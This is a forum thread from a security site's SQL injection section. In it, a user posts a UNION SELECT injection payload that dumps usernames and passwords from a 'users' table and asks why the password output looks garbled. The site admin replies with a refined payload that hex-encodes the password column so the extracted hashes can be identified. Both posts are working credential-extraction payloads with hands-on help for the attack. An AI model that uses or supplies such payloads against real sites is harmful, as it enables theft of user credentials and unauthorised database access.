Waraxe IT Security Portal
Login or Register
December 11, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 120
Members: 0
Total: 120
Full disclosure
SEC Consult SA-20241204-0 :: Multiple Critical Vulnerabilities in Image Access Scan2Net (14 CVE)
Microsoft Warbird and PMP security research - technical doc
Access Control in Paxton Net2 software
SEC Consult SA-20241127-0 :: Stored Cross-Site Scripting in Omada Identity (CVE-2024-52951)
SEC Consult SA-20241125-0 :: Unlocked JTAG interface and buffer overflow in Siemens SM-2558 Protocol Element, Siemens CP-2016 & CP-2019
Re: Local Privilege Escalations in needrestart
APPLE-SA-11-19-2024-5 macOS Sequoia 15.1.1
Local Privilege Escalations in needrestart
APPLE-SA-11-19-2024-4 iOS 17.7.2 and iPadOS 17.7.2
APPLE-SA-11-19-2024-3 iOS 18.1.1 and iPadOS 18.1.1
APPLE-SA-11-19-2024-2 visionOS 2.1.1
APPLE-SA-11-19-2024-1 Safari 18.1.1
Reflected XSS - fronsetiav1.1
XXE OOB - fronsetiav1.1
St. Poelten UAS | Path Traversal in Korenix JetPort 5601
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> Sql injection -> Ascii or other ?
Post new topicReply to topic View previous topic :: View next topic
Ascii or other ?
PostPosted: Thu Mar 13, 2008 5:23 pm Reply with quote
julioisaias
Valuable expert
Valuable expert
Joined: Jan 25, 2008
Posts: 50




What kind of code is?
------------------------

Code:

UNION ALL SELECT 1,concat(usr,0x3a,pass),3,4,5,6,7,8,9 FROM users


Result:

admin:<6>;=


Doing "LIMIT"
----------------

user2:ÖÑØ–‘£áÜ

user3:Ù̧_ci§
.
.
.
userx:ÙÔ靕¡£•¦


Best Regards

_________________
I study enough to make the rest a result.
View user's profile Send private message
PostPosted: Thu Mar 13, 2008 5:33 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




Mainly there is 2 situations:

1. it can be plainext password with cyrillic or other foreign characters
2. it is binary BLOB data - this is what i think it is ...

Try:

Code:

UNION+ALL+SELECT+1,concat(usr,0x3a,HEX(pass)),3,4,5,6,7,8,9 FROM users


Then look at hex-coded passwords length - it can be some common hash algorithm, just stored in database as binary blob ...
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Fri Mar 14, 2008 9:27 pm Reply with quote
julioisaias
Valuable expert
Valuable expert
Joined: Jan 25, 2008
Posts: 50




thanks! waraxe

thanks... best regards!

_________________
I study enough to make the rest a result.
View user's profile Send private message
Ascii or other ?
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 1

Post new topicReply to topic


Powered by phpBB 2001-2008 phpBB Group



Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.045 Seconds